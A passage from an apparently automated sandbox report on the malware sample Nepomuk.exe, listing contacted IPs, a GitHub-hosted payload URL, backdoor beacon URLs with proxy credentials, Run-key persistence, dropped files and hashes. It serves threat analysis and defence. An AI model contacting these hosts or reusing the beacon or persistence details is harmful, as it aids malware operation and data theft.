                                                                                                                                                            https://91.212.166.19:443HelperT68WJ1SM1U30WFLN7XXTLWOX8.exe, 00000007.00000002.2473280587.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2472321608.000000000492A000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.000000000447C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://raw.githubusercontent.com:443/DLMKER/LeryStable/refs/heads/main/Airdroid.exeNepomuk.exe, 00000000.00000003.1466158005.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466378385.0000000003FEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://gemini.google.com/app?q=Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high

                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public IPs

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    104.21.42.7
                                                                                                                                                                    		changeaie.topUnited States
                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                    46.8.232.106
                                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                                    		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                                                                                                                                                    194.28.226.181
                                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                                    		34995SYSTEM-LTD-ASRUfalse
                                                                                                                                                                    140.82.114.3
                                                                                                                                                                    		github.comUnited States
                                                                                                                                                                    		36459GITHUBUSfalse
                                                                                                                                                                    193.187.172.163
                                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                                    		64439ITOS-ASRUfalse
                                                                                                                                                                    147.45.196.157
                                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                                    		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                    185.121.233.152
                                                                                                                                                                    		unknownSpain
                                                                                                                                                                    		198432IPCORE-ASEStrue
                                                                                                                                                                    91.212.166.19
                                                                                                                                                                    		unknownUnited Kingdom
                                                                                                                                                                    		35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                                                                                                                                                                    185.199.111.133
                                                                                                                                                                    		raw.githubusercontent.comNetherlands
                                                                                                                                                                    		54113FASTLYUSfalse
                                                                                                                                                                    46.8.236.61
                                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                                    		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                                                                                                                                                    38.244.132.66
                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                    		174COGENT-174USfalse

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                    Analysis ID:1663719
                                                                                                                                                                    Start date and time:2025-04-12 09:25:16 +02:00
                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 8m 50s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                    Number of analysed new started processes analysed:19
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Sample name:Nepomuk.exe
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.rans.troj.spyw.evad.winEXE@14/10@5/11
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 80%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 95%
                                                                                                                                                                    • Number of executed functions: 40
                                                                                                                                                                    • Number of non-executed functions: 130
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                    Warnings

                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.213.193, 172.202.163.200
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 4364 because it is empty
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    03:26:25API Interceptor7x Sleep call for process: Nepomuk.exe modified
                                                                                                                                                                    03:26:50API Interceptor8x Sleep call for process: powershell.exe modified
                                                                                                                                                                    08:26:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe
                                                                                                                                                                    08:27:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    104.21.42.7IMSoftware{Launcher}3.21.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      nper1lu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        launcher.exeGet hashmaliciousDarkTortilla, LummaC StealerBrowse
                                                                                                                                                                          46.8.232.106file.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                                                                          • 46.8.232.106:30001/api/helper-first-register?buildVersion=0amA.8nP201o&md5=2b69877c5f831a0779b9f3f81d1842be&proxyPassword=BnF8bMcb&proxyUsername=TOD3V80j&userId=szA7Ba3Yc729WikLvRNgF8Kv
                                                                                                                                                                          IQ5P4x6fTG.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                          • 46.8.232.106:30001/api/helper-first-register?buildVersion=0NKZ.RIz2WoY&md5=62d09f076e6e0240548c2f837536a46a&proxyPassword=FUoMdiYg&proxyUsername=i9Im3093&userId=Pih2090h4mGCxChGTFD0FytT
                                                                                                                                                                          Owncloud.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                                                                          • 46.8.232.106:30001/api/helper-first-register?buildVersion=03qc.PAF2fNG&md5=8bcd144423a25770c111195f74b1e7cb&proxyPassword=ehN72P79&proxyUsername=M3DnCdHP&userId=THuCW3o0ISC6MsfE1dNJ3Hhb
                                                                                                                                                                          d14UiyNFof.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                          • 46.8.232.106/
                                                                                                                                                                          gj572likmMGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                          • 46.8.232.106/
                                                                                                                                                                          SecuriteInfo.com.Win32.Malware-gen.16936.26880.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                          • 46.8.232.106/
                                                                                                                                                                          file.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                          • 46.8.232.106:30001/api/helper-first-register?buildVersion=0pTk.PWh2DyJ&md5=bb8575526575a9c31e68797e9bd30ac2&proxyPassword=uDoSfUGf&proxyUsername=vuj8wvk4&userId=gpn4wrgAehjlgkUKkN33e4iDkc1OfRHK
                                                                                                                                                                          gubaa01.ps1Get hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                                                                          • 46.8.232.106/
                                                                                                                                                                          file.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                                                                          • 46.8.232.106/
                                                                                                                                                                          SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                          • 46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLse
                                                                                                                                                                          194.28.226.1818WP4kjLq8L.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                                                                            140.82.114.3log.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • github.com/RQ3Xd/1/raw/refs/heads/main/log.bin

                                                                                                                                                                            Domains

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            raw.githubusercontent.comSetupByLumenTeamV10.16.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                            NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 185.199.108.133
                                                                                                                                                                            NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 185.199.108.133
                                                                                                                                                                            NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                            NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            Notification_Of_Dependants_2025-4-2.vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                            https://github.com/nvm-sh/nvmGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                            fileless.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 185.199.108.133
                                                                                                                                                                            pl-st2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                            fileless.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            changeaie.topaomei_partition_assistant_v10.8.0_technician_winpe_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            aomei_partition_assistant_v10.8.0_technician_winpe_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            67f525209658e.vbsGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            IMSoftware{Launcher}3.21.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            nper1lu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            nertuetetaaa.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            gebrelas.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            boitrlkg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            launcher.exeGet hashmaliciousDarkTortilla, LummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                            • 172.64.80.1
                                                                                                                                                                            github.comhttps://jk.ievintwayt.com/mgRXV5X/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                            • 140.82.112.3
                                                                                                                                                                            SetupByLumenTeamV10.16.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.114.4
                                                                                                                                                                            NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.113.3
                                                                                                                                                                            NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            https://jqih.ugsczwgr.es/d3LuDl4019e/$kwidmann@vulcancorp.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            https://forms.office.com/e/v86Z0QdF5RGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                            • 140.82.112.3
                                                                                                                                                                            random.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            Tokin Stealer.batGet hashmaliciousKDOT TOKEN GRABBERBrowse
                                                                                                                                                                            • 140.82.113.3

                                                                                                                                                                            ASNs

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            CLOUDFLARENETUSyap.batGet hashmaliciousKoadicBrowse
                                                                                                                                                                            • 104.16.231.132
                                                                                                                                                                            RE_0078234567965441.pdf.wsfGet hashmaliciousKoadicBrowse
                                                                                                                                                                            • 104.16.231.132
                                                                                                                                                                            Rd_client_w_a_s_d.exeGet hashmaliciousHTMLPhisher, LummaC StealerBrowse
                                                                                                                                                                            • 104.21.53.21
                                                                                                                                                                            Rd_client_w_a_s_d.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.207.200
                                                                                                                                                                            spy.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                                            • 172.67.25.94
                                                                                                                                                                            https://jk.ievintwayt.com/mgRXV5X/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                            • 104.18.95.41
                                                                                                                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.5.162
                                                                                                                                                                            Rd_client_w_a_s_d_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.53.21
                                                                                                                                                                            aomei_partition_assistant_v10.8.0_technician_winpe_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            aomei_partition_assistant_v10.8.0_technician_winpe_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 172.67.197.226
                                                                                                                                                                            GITHUBUShttps://jk.ievintwayt.com/mgRXV5X/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                            • 140.82.112.3
                                                                                                                                                                            SetupByLumenTeamV10.16.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.114.4
                                                                                                                                                                            NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.113.3
                                                                                                                                                                            NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            https://jqih.ugsczwgr.es/d3LuDl4019e/$kwidmann@vulcancorp.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            https://forms.office.com/e/v86Z0QdF5RGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                            • 140.82.112.3
                                                                                                                                                                            random.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                            • 140.82.113.4
                                                                                                                                                                            Tokin Stealer.batGet hashmaliciousKDOT TOKEN GRABBERBrowse
                                                                                                                                                                            • 140.82.113.3
                                                                                                                                                                            FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsLWUN5H1ZEUBNSNFQWTH.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                            • 46.8.232.106
                                                                                                                                                                            LWUN5H1ZEUBNSNFQWTH.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                            • 46.8.232.106
                                                                                                                                                                            888.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                            • 46.8.232.106
                                                                                                                                                                            888.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                            • 46.8.232.106
                                                                                                                                                                            888.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                            • 46.8.232.106
                                                                                                                                                                            888.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                            • 46.8.232.106
                                                                                                                                                                            utorrent_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 46.44.17.23
                                                                                                                                                                            New_seTup_File.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                                                                            • 46.8.232.106
                                                                                                                                                                            Soundwire.exeGet hashmaliciousGO BackdoorBrowse
                                                                                                                                                                            • 46.8.232.106
                                                                                                                                                                            New_seTup_File_patched.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                                                                            • 46.8.232.106
                                                                                                                                                                            SYSTEM-LTD-ASRU8WP4kjLq8L.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                                                                            • 194.28.226.181
                                                                                                                                                                            NTS_eTaxInvoice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                            • 193.169.228.68
                                                                                                                                                                            miori.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 193.169.228.154
                                                                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                            • 193.169.228.126
                                                                                                                                                                            jMMTZcFBa8.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                            • 192.162.64.118
                                                                                                                                                                            nTDlOKAKOW.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 193.169.228.134
                                                                                                                                                                            YBhfdLY43P.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                            • 194.28.225.34
                                                                                                                                                                            b3astmode.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                            • 193.169.228.152
                                                                                                                                                                            DlgO6e5RdV.exeGet hashmaliciousGuLoader, SmokeLoaderBrowse
                                                                                                                                                                            • 194.28.226.255
                                                                                                                                                                            A5TMp5flDP.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                            • 193.169.228.104

                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1RE_0078234567965441.pdf.wsfGet hashmaliciousKoadicBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            Rd_client_w_a_s_d.exeGet hashmaliciousHTMLPhisher, LummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            Rd_client_w_a_s_d.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            spy.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            Rd_client_w_a_s_d_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            aomei_partition_assistant_v10.8.0_technician_winpe_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            aomei_partition_assistant_v10.8.0_technician_winpe_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            Rd_client_w_a_s_d_patched.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                            67f525209658e.vbsGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            • 104.21.42.7
                                                                                                                                                                            • 140.82.114.3
                                                                                                                                                                            • 185.199.111.133

                                                                                                                                                                            Dropped Files

                                                                                                                                                                            No context

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1264
                                                                                                                                                                            Entropy (8bit):5.382861530677599
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:3FaWSKco4KmM6GjKbm51s4RPQoUebIl+mZ9tXt/NK3R8O9rD:AWSU4YymI4RIoUeU+mZ9tlNWR8GX
                                                                                                                                                                            MD5:8B9BA489BF1F8C966662141E027D49ED
                                                                                                                                                                            SHA1:B28CA450EBA1640EA193DADC2DCBB824D1A02075
                                                                                                                                                                            SHA-256:481B33F8DA302B70E77295E9683459FB311E74CF2FAFC515CDB991F9A00DFED7
                                                                                                                                                                            SHA-512:38D982ED908B774B1F312B5E5687807914BA0BDEF3AD78A7EE87A1811C2CD5426C82A0A005D94474288FCDEFC5BD9589A4489958D7D6BAB1F8D79753248DC8FF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview:@...e.................................:.........................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\NrEXDJiACHo.exe

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9746432
                                                                                                                                                                            Entropy (8bit):7.993954868419722
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:196608:newtZn2m0UVg+vQcHRqtTxOGzQJlqIJptgvtks+q97oPJQ6UVZk8D:eoZhl2mhRqtMqQleKq5QJQ6UVZj
                                                                                                                                                                            MD5:8DDC00B505740E2BE081FCF120A6523A
                                                                                                                                                                            SHA1:9114E810BFA5EA52F77BB19FFBA394D4DDEB2EA6
                                                                                                                                                                            SHA-256:854D5AC4352C653DBB566A39DE26F260181A666C01DC8F26347585BCD129A99D
                                                                                                                                                                            SHA-512:6EDFE2C660F8A6ECF5A040F6B3A4FFA9F40408A40100A1B07909A32A2EF59AA9E7F281A82176BAF4E848CFB8D22F8B44BFCD7DC715EFC0F8AF91C75D2CE2380A
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................(........................@.......................................@.........................\U..U....[..P.... R. .B....................@....................................................a...............................text....&.......(.................. ..`.rdata..IA...@...B...,..............@..@.data....wQ......pQ..n..............@....CRT..........R.......Q.............@..@.rsrc... .B.. R...B...Q.............@..@.reloc..@..........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\Nepomuk.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9746432
                                                                                                                                                                            Entropy (8bit):7.993954868419722
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:196608:newtZn2m0UVg+vQcHRqtTxOGzQJlqIJptgvtks+q97oPJQ6UVZk8D:eoZhl2mhRqtMqQleKq5QJQ6UVZj
                                                                                                                                                                            MD5:8DDC00B505740E2BE081FCF120A6523A
                                                                                                                                                                            SHA1:9114E810BFA5EA52F77BB19FFBA394D4DDEB2EA6
                                                                                                                                                                            SHA-256:854D5AC4352C653DBB566A39DE26F260181A666C01DC8F26347585BCD129A99D
                                                                                                                                                                            SHA-512:6EDFE2C660F8A6ECF5A040F6B3A4FFA9F40408A40100A1B07909A32A2EF59AA9E7F281A82176BAF4E848CFB8D22F8B44BFCD7DC715EFC0F8AF91C75D2CE2380A
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................(........................@.......................................@.........................\U..U....[..P.... R. .B....................@....................................................a...............................text....&.......(.................. ..`.rdata..IA...@...B...,..............@..@.data....wQ......pQ..n..............@....CRT..........R.......Q.............@..@.rsrc... .B.. R...B...Q.............@..@.reloc..@..........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h03lqtw1.ber.psm1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iak2lajb.imd.psm1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
